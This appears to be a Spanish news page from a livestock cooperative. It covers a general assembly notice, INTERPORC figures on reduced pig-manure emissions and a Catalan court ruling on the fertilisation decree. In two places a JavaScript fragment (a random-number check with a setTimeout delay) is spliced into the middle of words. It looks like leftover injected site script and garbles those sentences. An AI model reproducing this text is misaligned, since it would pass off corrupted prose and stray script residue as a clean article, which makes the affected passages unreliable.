El próximo 29 de junio el GAP SCCL celebra una nueva edición de la Asamblea General Ordinaria

El próximo martes 29 de junio, el conjunto de socias y socios de GAP Cooperativa están llamados a participar en una nueva edición de su Asamblea General Ordinaria que, en esta ocasión, se llevará a cabo en la Pista del Parque Alegría de Juneda, una nueva ubicación que permitirá realizar este significativo encuentro de una manera presencial cumpliendo con todos los protocolos de prevención de la Covid-19. En este sentido, es importante destacar que los participantes deberán inscribirse y confirmar su participación en la Asamblea antes de las 13.00 horas del lunes 28 de junio.

La celebración de esta Asamblea General Ordinaria está prevista para las 19.30 horas en primera convocatoria y media hora más tarde en segunda. Entre otros puntos del orden del día, la asamblea servirá para presentar el informe de la gestión social. Asimismo, se realizará la presentación y aprobación, si procede, del balance de situación, la cuenta de pérdidas y ganancias, de la memoria económica del ejercicio cerrado a 31 de diciembre de 2020, así como la gestión del Consejo rector llevada a cabo durante el ejercicio 2020.

La situación del proyecto Nueva Tracjusa o la Fundación Ara Garrigues, impulsada por GAP SCCL, serán otros de los punto de interés de este encuentro de ganaderos y ganaderas.

Convocatoria Assemblea General 29-06-2021

El sector porcino reduce en más de un 41% sus emisiones GEI derivadas de la gestión de estiércoles

  • Las emisiones de metano se reducen en un 37,5% y las de óxido nitroso en un 38,02%, según destaca INTERPORC
  • La reducción de emisiones GEI por gestión de estiércoles desde el año 2005 se debe en buena medida al desarrollo de unas pautas de alimentación muy ajustadas para cada animal

En el periodo 2005-2019 el sector porcino de capa blanca español ha reducido un 41,2% sus emisiones de Gases de Efecto Invernadero derivadas de los sistemas de gestión de estiércoles del ganado porcino, según los datos del último Informe de Inventario Nacional Gases de Efecto Invernadero (marzo 2021).

Con motivo de la celebración del Día Mundial del medio Ambiente, INTERPORC destaca el esfuerzo realizado por las granjas de porcino españolas, que en el año 2005 emitían 1 kilotonelada de CO2 por cada 524 toneladas de carne producidas, mientras que en el año 2019 emitieron 1 kilotonelada de CO2 por cada 891toneladas de carne producidas.

Asimismo, por tipos de emisiones derivadas de la gestión de estiércoles, se reducen tanto las de metano -en un 37,5%- como las de óxido nitroso, en un 38,02%.

Es a partir del año 2005 cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando la reducción de las emisiones empieza a hacerse muy patente debida, en buena medida, al desarrollo de unas pautas de alimentación muy ajustadas por animal.

En los últimos años el sector ha sustituido progresivamente en la alimentación de los animales, ingredientes ricos en fibra y de baja digestibilidad por cereales, y ha aumentado la cantidad y calidad de proteínas, así como ha incorporado aminoácidos sintéticos y enzimas digestivas, lo que ha favorecido la digestibilidad en la dieta y reduce de forma considerable las emisiones GEI derivadas de las excreciones.

Año tras año, el sector porcino avanza en sus objetivos para alcanzar un impacto climático neutro de cara a 2050. Para lograrlo, no solo cumple con la normativa más exigente del mundo en el respeto al medio ambiente, que es la europea, sino que además trabaja minuciosamente para, entre otras cuestiones: reducir sus emisiones GEI, hacer un uso más eficiente del agua o disminuir el consumo de energía o la generación de plásticos no reutilizables, residuos o desperdicios.

Fuente de información: INTERPORC

Ganan parcialmente el recurso contra el Decreto de fertilización para la limitación de nuevas explotaciones y ampliaciones que apliquen deyecciones en zonas vulnerables

Fuente de información artículo: Unió de Pagesos

Unió de Pagesos celebra que la Sala Contencioso Administrativo del Tribunal Superior de Justicia de Cataluña (TSJC) haya estimado parcialmente el recurso contencioso administrativo interpuesto por el sindicato en octubre del 2019 contra el Decreto 153/2019, de 3 de julio, de gestión de la fertilización del suelo y de las deyecciones ganaderas y de aprobación del programa de actuación en las zonas vulnerables en relación con la contaminación por nitratos procedentes de fuentes agrarias.

El TSJC ha considerado nulo el apartado segundo de la Disposición Transitoria Primera que establecía que si transcurrido un año desde la próxima modificación o la ampliación de las designaciones de zonas vulnerables, el Gobierno no revisaba el programa de actuación en estas zonas, éste seguía vigente sin permitir la implantación de nuevas explotaciones ganaderas ni ampliaciones de capacidad de las existentes que apliquen deyecciones ganaderas en los municipios designados como zonas vulnerables.

En el recurso, el sindicato denunció que consideraba arbitrario que la inacción de la Administración en la revisión o la ampliación del programa de actuación de las zonas vulnerables, después de un año de su vencimiento, comportara más limitaciones a las explotaciones ganaderas que las previstas en el nuevo decreto. Este ya limita en pocos supuestos las posibilidades de ampliación o implantación de nuevas explotaciones que apliquen deyecciones en zona vulnerable. Con respecto a esta cuestión, el TSJC ha considerado que «este régimen, más costoso que el establecido en el propio Decreto, no tiene amparo legal y se encuentra absolutamente inmotivado, más allá de pretender ser justificado, basándose el incumplimiento por parte de la Administración de sus propias obligaciones, por lo que el recurso debe ser estimado en parte, y anularse el apartado 2 de esta disposición transitoria primera. »

El sindicato sigue trabajandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando para incorporar mejoras en la próxima revisión del Decreto y, paralelamente, en la promulgación de un decreto ley para dejar sin efecto determinadas obligaciones en las zonas no vulnerables y ajustarlo estrictamente a las obligaciones europeas en estas materias , además de dejar, al menos hasta el 2028, el logro del resto de objetivos ambientales y de gestión agronómica a las medidas de fomento de la Política Agraria Común (PAC).